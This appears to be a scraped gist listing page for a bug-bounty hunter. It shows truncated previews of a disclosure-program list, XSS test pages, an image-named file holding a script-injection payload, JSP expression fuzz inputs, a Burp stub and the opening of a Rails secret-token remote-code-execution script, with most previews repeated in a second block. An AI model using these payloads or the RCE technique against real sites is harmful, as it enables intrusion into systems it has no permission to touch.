Arbaz Hussain arbazkiraak

## bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue

## phantonjs-xss.html
<html>
<head></head>
<body>

<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>

## rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

## test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>

## offsets
[array('i', [143, 150]),
 array('i', [207, 214]),
 array('i', [753, 760]),
 array('i', [931, 938]),
 array('i', [1140, 1147]),
 array('i', [1390, 1397]),
 array('i', [1543, 1550]),
 array('i', [1666, 1673]),
 array('i', [1950, 1957]),
 array('i', [4193, 4200]),

## gist:77bb058366e5d646cf4f58869e4da190
from  burp import IBurpExtender,IProxyListener

class BurpExtender(IBurpExtender,IProxyListener):
    def registerExtenderCallbacks(self,callbacks):
        self._helpers = callbacks.getHelpers()
        self._callbacks = callbacks
        self._callbacks.setExtensionName("IProxyListener Params")
        self._callbacks.registerProxyListener(self)

    def processProxyMessage(self,messageIsRequest,message):

## jsp-jstl-intruders.txt
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}

## CryptoBot.py
import requests,json,bs4,time,threading,datetime,logging
from binance.client import Client
requests.packages.urllib3.disable_warnings()
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext.dispatcher import run_async

########### KEYS #######################
updater = Updater(token='<TELEGRAM-TOKEN>')
dispatcher = updater.dispatcher

## tmux_cheatsheet.markdown

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                arbazkiraak
                / tmux_cheatsheet.markdown
            
            
              Created
              March 17, 2018 10:10
                — forked from henrik/tmux_cheatsheet.markdown
            
              
                tmux cheatsheet
              
          
    tmux cheatsheet

As configured in my dotfiles.
start new:
tmux

start new with session name:

  
## gist:fb737f1f745ae07193860762f8710935
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*
	google dork -> site:.co.uk inurl:"responsible disclosure"
	https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
	http://www.123contactform.com/security-acknowledgements.htm
	https://18f.gsa.gov/vulnerability-disclosure-policy/
	https://support.1password.com/security-assessments/
	https://www.23andme.com/security-report/
	https://www.abnamro.com/en/footer/responsible-disclosure.html
	https://www.accenture.com/us-en/company-accenture-responsible-disclosure
	https://www.accredible.com/white_hat/
	https://www.acquia.com/how-report-security-issue
	<html>
	<head></head>
	<body>

	<a href="javascript: alert('clicked xss link')" id="link">click me</a>
	<img src="xx" onerror="alert('xss')" />
	</body>
	</html>
	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +
	[array('i', [143, 150]),
	array('i', [207, 214]),
	array('i', [753, 760]),
	array('i', [931, 938]),
	array('i', [1140, 1147]),
	array('i', [1390, 1397]),
	array('i', [1543, 1550]),
	array('i', [1666, 1673]),
	array('i', [1950, 1957]),
	array('i', [4193, 4200]),
	from burp import IBurpExtender,IProxyListener

	class BurpExtender(IBurpExtender,IProxyListener):
	def registerExtenderCallbacks(self,callbacks):
	self._helpers = callbacks.getHelpers()
	self._callbacks = callbacks
	self._callbacks.setExtensionName("IProxyListener Params")
	self._callbacks.registerProxyListener(self)

	def processProxyMessage(self,messageIsRequest,message):
	${0 }
	${0 == pageList.maxPage}
	${1}
	${1 eq currentPageNumber }
	${5}
	${5/6}
	${a+1 }
	${a.academyName}
	${a.academyNumber}
	${academyNumber==a.academyNumber}
	import requests,json,bs4,time,threading,datetime,logging
	from binance.client import Client
	requests.packages.urllib3.disable_warnings()
	from telegram.ext import Updater
	from telegram.ext import CommandHandler
	from telegram.ext.dispatcher import run_async

	########### KEYS #######################
	updater = Updater(token='<TELEGRAM-TOKEN>')
	dispatcher = updater.dispatcher